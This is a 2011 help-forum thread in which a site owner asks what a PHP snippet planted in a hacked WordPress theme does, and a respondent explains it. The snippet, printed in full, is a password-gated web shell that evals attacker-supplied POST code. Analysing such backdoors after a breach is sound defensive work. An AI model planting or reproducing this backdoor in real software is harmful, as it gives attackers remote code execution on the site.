Go Premium for a chance to win a PS4. Enter to Win


Decrypt Malicious inserterted PHP

Posted on 2011-09-27
Medium Priority
Last Modified: 2012-05-12
I had a client's WordPress website hacked last week because of a leaky thumb.php. Cleaned up the website and replaced the leaky thumb.php. A PHP file was added to the theme's cached:
if(md5($_POST["key"]) == "f732d47960be7e806861987f98a9574c"){
$cmd = $_POST["code"];
eval (stripslashes($cmd));

Open in new window

I need someone to explain this code to me, Did find: http://wordpress.org/support/topic/new-hack-attempt-on-self-hosted-wordpress-site but no precise explanation was given

PS The malicious code consequently added to a WP core file I have not added here
Question by:rhandalthor
LVL 70

Accepted Solution

Jason C. Levine earned 2000 total points
ID: 36714634
If a specially crafted post is sent to the site with a variable of "key" defined, line 1 evaluates and turns into a command that lines 2 and 3 execute.  

I assume it does something less than optimal :)

Author Comment

ID: 36714679
Yeah. Hadn't worked with $_POST for a while and certainly not this way. Well, think all is cleaned up and fortified again.. Thanks Jason.

Featured Post

Free Tool: Subnet Calculator

The subnet calculator helps you design networks by taking an IP address and network mask and returning information such as network, broadcast address, and host range.

One of a set of tools we're offering as a way of saying thank you for being a part of the community.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Many old projects have bad code, but the budget doesn't exist to rewrite the codebase. You can update this code to be safer by introducing contemporary input validation, sanitation, and safer database queries.
When the s#!t hits the fan, you don’t have time to look up who’s on call, draft emails, call collaborators, or send text messages. An instant chat window is definitely the way to go, especially one like HipChat. HipChat is a true business app. An…
The viewer will get a basic understanding of what section 508 compliance can entail, learn about skip navigation links, alt text, transcripts, and font size controls.
The is a quite short video tutorial. In this video, I'm going to show you how to create self-host WordPress blog with free hosting service.
Suggested Courses
Course of the Month12 days, 17 hours left to enroll

971 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question